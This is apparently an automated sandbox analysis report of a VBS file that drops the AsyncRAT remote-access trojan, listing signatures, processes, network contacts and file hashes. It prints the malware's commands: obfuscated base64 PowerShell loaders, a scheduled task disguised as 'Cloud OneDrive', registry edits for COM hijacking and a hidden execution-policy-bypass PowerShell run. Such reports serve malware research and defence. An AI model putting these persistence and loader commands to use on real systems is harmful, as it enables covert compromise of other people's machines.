Malware Analysis Report

2024-11-30 19:34

Sample ID 240918-bnq1mavgrq
Target 5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296.vbs
SHA256 5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296
Tags
execution asyncrat le's do it agilenet discovery persistence privilege_escalation rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296

Threat Level: Known bad

The file 5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296.vbs was found to be: Known bad.

Malicious Activity Summary

execution asyncrat le's do it agilenet discovery persistence privilege_escalation rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Event Triggered Execution: Component Object Model Hijacking

Obfuscated with Agile.Net obfuscator

Checks computer location settings

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-18 01:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-18 01:17

Reported

2024-09-18 01:20

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296.vbs"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $udvqhnorgmakexczpfbs = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('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'));powershell $udvqhnorgmakexczpfbs

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&( $Env:COMsPeC[4,15,25]-JOin'')( NEW-obJECt Io.STrEAmReadER( (NEW-obJECt io.cOMPReSSioN.DefLateStREaM([Io.mEMorystREaM] [ConVerT]::FrOmBASE64sTriNG('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'), [Io.COmpRession.cOMPrESSIonmOde]::DEcOMPrEss)) , [sYSTEm.tEXt.ENCodIng]::ascIi) ).READtOEnD()"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | www1.coulmandental.com | udp
US | 34.192.83.212:443 | www1.coulmandental.com | tcp
US | 34.192.83.212:443 | www1.coulmandental.com | tcp

Files

memory/3048-4-0x000007FEF493E000-0x000007FEF493F000-memory.dmp

memory/3048-5-0x000000001B620000-0x000000001B902000-memory.dmp

memory/3048-7-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

memory/3048-6-0x0000000002860000-0x0000000002868000-memory.dmp

memory/3048-9-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

memory/3048-10-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

memory/3048-8-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

memory/3048-11-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 6d88a181bee8d8aacdf9e0ef1881d4b5
SHA1 4895f61bc96f6c513fe9b23cb9563adea8f0ed62
SHA256 059e74c13adcd39a5ff9d087beb7d7d6c3157c50a3ce4ed336e678123504d8da
SHA512 6865174e3e1bf11884628a3be6694f03193c147f39f8421400f8fc143eb8666ee1458f80e887c0d65f6d48d07db553cf551d2f0982c64c95cd93e201836e2833

memory/3048-17-0x000007FEF493E000-0x000007FEF493F000-memory.dmp

memory/3048-18-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

memory/3048-19-0x000007FEF4680000-0x000007FEF501D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-18 01:17

Reported

2024-09-18 01:20

Platform

win10v2004-20240802-en

Max time kernel

147s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296.vbs"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Obfuscated with Agile.Net obfuscator

agilenet
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" | C:\Windows\system32\reg.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2268 wrote to memory of 3620 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2268 wrote to memory of 3620 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3620 wrote to memory of 4048 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3620 wrote to memory of 4048 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4048 wrote to memory of 4444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe
PID 4048 wrote to memory of 4444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe
PID 4248 wrote to memory of 4252 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 4248 wrote to memory of 4252 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 4252 wrote to memory of 1116 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 4252 wrote to memory of 1116 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 4252 wrote to memory of 1820 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 4252 wrote to memory of 1820 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 4252 wrote to memory of 4932 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4252 wrote to memory of 4932 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4932 wrote to memory of 3500 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4932 wrote to memory of 3500 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3500 wrote to memory of 772 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3500 wrote to memory of 772 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3500 wrote to memory of 772 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3500 wrote to memory of 772 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5e6239bd4eb9b79fa56b321de3d53eccba2e9d61ab38c8d4005bee46337c8296.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $udvqhnorgmakexczpfbs = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('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'));powershell $udvqhnorgmakexczpfbs

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&( $Env:COMsPeC[4,15,25]-JOin'')( NEW-obJECt Io.STrEAmReadER( (NEW-obJECt io.cOMPReSSioN.DefLateStREaM([Io.mEMorystREaM] [ConVerT]::FrOmBASE64sTriNG('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'), [Io.COmpRession.cOMPrESSIonmOde]::DEcOMPrEss)) , [sYSTEm.tEXt.ENCodIng]::ascIi) ).READtOEnD()"

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f

C:\Windows\system32\cmd.exe

cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | www1.coulmandental.com | udp
US | 34.192.83.212:443 | www1.coulmandental.com | tcp
US | 8.8.8.8:53 | 212.83.192.34.in-addr.arpa | udp
US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp
US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp
US | 88.119.175.153:8808 | | tcp
US | 8.8.8.8:53 | 153.175.119.88.in-addr.arpa | udp

Files

memory/3620-0-0x00007FFCA0693000-0x00007FFCA0695000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i552myhl.png.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3620-10-0x0000019950F80000-0x0000019950FA2000-memory.dmp

memory/3620-11-0x00007FFCA0690000-0x00007FFCA1151000-memory.dmp

memory/3620-12-0x00007FFCA0690000-0x00007FFCA1151000-memory.dmp

memory/3620-22-0x00007FFCA0693000-0x00007FFCA0695000-memory.dmp

memory/3620-23-0x00007FFCA0690000-0x00007FFCA1151000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8d089c855358969266a3275f0ec4f955
SHA1 5ce30b598cfa0c2008541b1b549673401971dc3d
SHA256 e198883dc78657f44bae11e2de5f56bc0f41eb6440f73cd3d65c30878b858734
SHA512 f240dcfc7adcca3140cdc2f8f387ac2053a7fd6e5e474a4008cf38d03506f99e361a5d6e970480ab1155ad00531b9d9095ed2a502ad09e7e442cdf7bcf932320

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/3620-32-0x00007FFCA0690000-0x00007FFCA1151000-memory.dmp

C:\ProgramData\Cloud\cloud.vbs

MD5 7079642a22a106d0ed6f227cc70899ae
SHA1 60dd57af3518c0ea4104379ad233b5982b231283
SHA256 b098e1055dc3dd3156236ee515e5dfbefd746d84578197f2309968625b831724
SHA512 ca1e9e201785fa611520ee2585208fb0684fd338ff1ab1d515523e03677ac4ac1ca5353fdc17bcba4c6c39aa37f9be182c5f7187b8dd9520c8604a001bd69f80

C:\ProgramData\Cloud\cloud.bat

MD5 b8bdfc7895feaaacba3711d17be6778a
SHA1 fa0bc12827b348fe540a13683897deb207650df7
SHA256 e209153dda335fec8fa021f1022c4f9fe041cb527c2b9068eb9ec911429f20a3
SHA512 ea91a8262eacba0bcd6f692b5141124d7fedc98507ad6ab71ade565b347fe328780221f6972cc5c98a9471662474bf8c93e1219d241ff5f90579f7f8e8dd5156

C:\ProgramData\Cloud\cloud.ps1

MD5 d93d9d8d63201a2e547d4e1dde62d6d7
SHA1 5a2273543ad08d5f749c9c7ee60e0b703548b8e7
SHA256 f5811cd347fc2f2d538625c468ae7ecbd8d0c18db495b9d3701204f7a13a527e
SHA512 59de80b3ce3e5406a8e1f2544fabb50a7d95b037143652fc0084b8bfe864337e0d4ab3cd14ef3c8249944bdccf9e27dce3471d955fac278ff45a68d32320e699

memory/3500-46-0x0000022A02170000-0x0000022A0217E000-memory.dmp

memory/772-47-0x0000000000F40000-0x0000000000F58000-memory.dmp

memory/772-49-0x0000000005970000-0x0000000005986000-memory.dmp

memory/772-50-0x0000000006240000-0x00000000067E4000-memory.dmp

memory/772-51-0x0000000005E80000-0x0000000005F12000-memory.dmp

memory/772-52-0x0000000006010000-0x000000000601A000-memory.dmp

memory/772-53-0x0000000006A30000-0x0000000006ACC000-memory.dmp

memory/772-54-0x0000000006AD0000-0x0000000006B36000-memory.dmp